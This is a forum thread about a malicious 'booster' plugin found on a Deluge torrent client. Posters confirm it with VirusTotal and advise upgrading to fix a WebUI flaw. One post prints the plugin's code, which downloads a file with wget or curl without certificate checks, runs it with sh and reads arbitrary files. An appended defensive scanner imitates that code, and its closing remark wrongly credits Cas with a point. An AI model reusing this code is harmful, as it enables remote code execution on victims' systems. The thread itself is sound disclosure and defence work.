[WebUI Vulnerability] Malicious plugin "booster" found on my system
ggez
New User
Posts: 2
Joined: Fri May 12, 2017 11:47 pm
OS or Distro: raspbian

[WebUI Vulnerability] Malicious plugin "booster" found on my system

Postby ggez » Sat May 13, 2017 3:53 am

Admin Edit: Upgrade to 1.3.15 to fix this vulnerability

I don't remember adding this plugin called booster. It was enabled under my plugins. I have uploaded the booster.egg here. Keep in mind that an .egg file can be opened as a .zip file... I can't find reference to this plugin ANYWHERE on the internet. Sorry if I'm being paranoid. I looked at the source and it seems to download and execute stuff :S

I am running deluge/deluge-web on Raspbian

https://drive.google.com/file/d/0B23kWKbsf7NgdTdGUklTakNINGM/view?usp=sharing

Cas
Top Bloke
Posts: 3442
Joined: Mon Dec 07, 2009 6:04 am
OS or Distro: Ubuntu 16.04
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Postby Cas » Sat May 13, 2017 7:04 am

If your webui is open to the internet it likely is a malicious egg utilising a known security flaw.

Upgrade to 1.3.15 as it has webui security fixes.

Cas
Top Bloke
Posts: 3442
Joined: Mon Dec 07, 2009 6:04 am
OS or Distro: Ubuntu 16.04
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Postby Cas » Sat May 13, 2017 7:16 am

Also, you should report this to Debian as a serious security issue.

Tvich
Member
Posts: 33
Joined: Thu Apr 27, 2017 6:36 pm
OS or Distro: Linux/Alpine,Debian

Re: Malicious plugin "booster" found on my system?

Postby Tvich » Sat May 13, 2017 8:05 am


Cas
Top Bloke
Posts: 3442
Joined: Mon Dec 07, 2009 6:04 am
OS or Distro: Ubuntu 16.04
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Postby Cas » Sat May 13, 2017 8:20 am

Tvich wrote: https://www.virustotal.com/en/file/210b3a10785287480c4dbd007859140972a5637213b15a1c82a37d92324c580e/analysis/1494662659/

It definitely is malicious, it is modified execute plugin code.

Tvich
Member
Posts: 33
Joined: Thu Apr 27, 2017 6:36 pm
OS or Distro: Linux/Alpine,Debian

Re: Malicious plugin "booster" found on my system?

Postby Tvich » Sat May 13, 2017 9:02 am

My bad, I misunderstood, thought it was Boost.Python. Don't know why. My bad :(

ggez
New User
Posts: 2
Joined: Fri May 12, 2017 11:47 pm
OS or Distro: raspbian

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Postby ggez » Sun May 14, 2017 4:08 pm

Oh sh!t, didn't expect it to be this bad... Any idea what it might have downloaded? Are there any paths that I can check?

Cas
Top Bloke
Posts: 3442
Joined: Mon Dec 07, 2009 6:04 am
OS or Distro: Ubuntu 16.04
Location: Scotland

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Postby Cas » Sun May 14, 2017 4:58 pm

There is likely no way to know for sure.

For reference, this is a partial summary of the code added to the execute plugin:

Code:

def looking_file(name):
    epath = os.environ.get("PATH", None)
    if not epath: epath = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/sbin", "/bin")
    for p in epath.split(":"):
        testname = p + "/" + name
        if os.path.exists(testname) and os.access(testname, os.X_OK):
            return testname
    return None

def internal_download(url, to):
    if sys.version_info[0] == 3:
        import urllib.request
        urllib.request.urlretrieve(url, to)
    else:
        import urllib
        urllib.urlretrieve(url, to)

def yahoo(URL):
    wget = looking_file("wget")
    curl = looking_file("curl")
    cmd = None
    if wget:
        cmd = wget + " -t 0 -T 15 -q --no-check-certificate -O %s %s"
    elif curl:
        cmd = curl + " --retry 0 --connect-timeout 15 -k -q -o %s %s "

    tmpfile = tempfile.mkstemp()
    tmpname = tmpfile[1]
    os.fdopen(tmpfile[0]).close()

    if cmd:
        try:
            tcmd = cmd % (tmpname, URL)
            Popen(tcmd, shell = True, stdout = PIPE, stderr = PIPE).communicate()
        except:
            pass
    else:
        try:
            if not os.path.exists(tmpname) or os.path.getsize(tmpname) == 0:
                internal_download(URL, tmpname)
        except Exception as err:
            return str(err)

    if os.path.exists(tmpname) and os.path.getsize(tmpname) > 0:
        try:
            os.chmod(tmpname, 0555)
            Popen("sh %s &" % tmpname, shell = True, stdout = PIPE, stderr = PIPE).communicate()
            time.sleep(2)
            os.remove(tmpname)
        except Exception as err:
            return str(err)
    return "OK"

    def get_file(self, filename):
        if os.path.exists(filename):
            fp = open(filename)
            data = fp.read()
            fp.close()
            return data
        else:
            return "FILE %s not exists" % filename
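As an added triage aid (not part of this thread and not Deluge's own code), the script below does what the thread's participants did by hand: it opens each plugin egg as a zip, hashes it for comparison with the VirusTotal SHA-256 quoted above, and greps the Python members for the download-and-execute pattern visible in the posted code (`urlretrieve`, `wget`/`curl` via `Popen(..., shell=True)` with certificate checks disabled, `chmod` followed by `sh <file> &`, hunting `$PATH` for executables). The plugin directory `~/.config/deluge/plugins` and the three-indicator threshold are assumptions; the two sample eggs are constructed in memory so the script runs without a Deluge install.

```python
"""Scan Deluge plugin eggs for the download-and-execute pattern (added example)."""
import hashlib
import io
import os
import re
import sys
import zipfile

# SHA-256 of the booster.egg sample as reported on VirusTotal in this thread.
KNOWN_BAD_SHA256 = {
    "210b3a10785287480c4dbd007859140972a5637213b15a1c82a37d92324c580e",
}

# Source-level indicators taken from the malicious code quoted in the thread.
# Each can occur in legitimate code; several together in a torrent-client
# plugin deserve a manual look.
INDICATORS = {
    "urlretrieve": re.compile(r"\burlretrieve\s*\("),
    "shell_popen": re.compile(r"Popen\s*\([^\n]*shell\s*=\s*True"),
    "chmod_exec": re.compile(r"os\.chmod\s*\([^)]*0o?555"),
    "sh_background": re.compile(r"sh\s+%s\s*&"),
    "no_cert_check": re.compile(r"--no-check-certificate|\s-k\s"),
    "path_binary_hunt": re.compile(r"os\.access\s*\([^)]*os\.X_OK"),
}


def scan_egg_bytes(data):
    """Return a report dict for one egg given its raw bytes."""
    sha = hashlib.sha256(data).hexdigest()
    report = {"sha256": sha, "known_bad": sha in KNOWN_BAD_SHA256,
              "hits": {}, "error": None}   # hits: member -> indicator names
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                if not member.endswith(".py"):
                    continue
                src = zf.read(member).decode("utf-8", errors="replace")
                found = sorted(n for n, rx in INDICATORS.items() if rx.search(src))
                if found:
                    report["hits"][member] = found
    except zipfile.BadZipFile as err:
        report["error"] = "not a zip/egg: %s" % err
    return report


def is_suspicious(report, threshold=3):
    """Known-bad hash, or at least `threshold` distinct indicators in one member (assumed cut-off)."""
    if report["known_bad"]:
        return True
    return any(len(v) >= threshold for v in report["hits"].values())


def scan_plugin_dir(plugin_dir):
    """Scan every *.egg in a directory; returns {filename: report}."""
    results = {}
    for name in sorted(os.listdir(plugin_dir)):
        if name.endswith(".egg"):
            with open(os.path.join(plugin_dir, name), "rb") as fh:
                results[name] = scan_egg_bytes(fh.read())
    return results


def build_sample_egg(members):
    """Construct an in-memory egg (zip archive) from {member: source}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member, src in members.items():
            zf.writestr(member, src)
    return buf.getvalue()


# Constructed samples: a harmless plugin and one mimicking the quoted code.
BENIGN_EGG = build_sample_egg({
    "hello/core.py": "def enable(self):\n    self.config = {}\n",
})
SUSPICIOUS_EGG = build_sample_egg({
    "booster/core.py": (
        "import os, tempfile\nfrom subprocess import Popen, PIPE\n"
        "def yahoo(URL):\n"
        "    cmd = wget + ' -t 0 -T 15 -q --no-check-certificate -O %s %s'\n"
        "    Popen(cmd % (tmpname, URL), shell = True, stdout = PIPE).communicate()\n"
        "    os.chmod(tmpname, 0o555)\n"
        "    Popen('sh %s &' % tmpname, shell = True).communicate()\n"
    ),
})

if __name__ == "__main__":
    # Assumed default location of a Deluge user's plugin eggs.
    target = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/.config/deluge/plugins")
    if os.path.isdir(target):
        for fname, rep in scan_plugin_dir(target).items():
            flag = "SUSPICIOUS" if is_suspicious(rep) else "ok"
            print("%-30s %s sha256=%s hits=%s" % (fname, flag, rep["sha256"], rep["hits"]))
    else:
        print("no plugin dir at %s; showing constructed samples only" % target)
    for label, egg in (("benign", BENIGN_EGG), ("suspicious", SUSPICIOUS_EGG)):
        rep = scan_egg_bytes(egg)
        print(label, "->", "SUSPICIOUS" if is_suspicious(rep) else "ok", rep["hits"])
```

Run it as `python3 scan_eggs.py [plugin_dir]`. A hash match against the thread's VirusTotal sample is conclusive; an indicator-count hit only says the egg deserves a look, since plugins such as Deluge's own Execute plugin legitimately spawn processes. As Cas notes, the downloaded payload is written to a `tempfile.mkstemp()` path and deleted two seconds after it runs, so scanning the egg tells you the plugin was malicious but not what the payload did.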

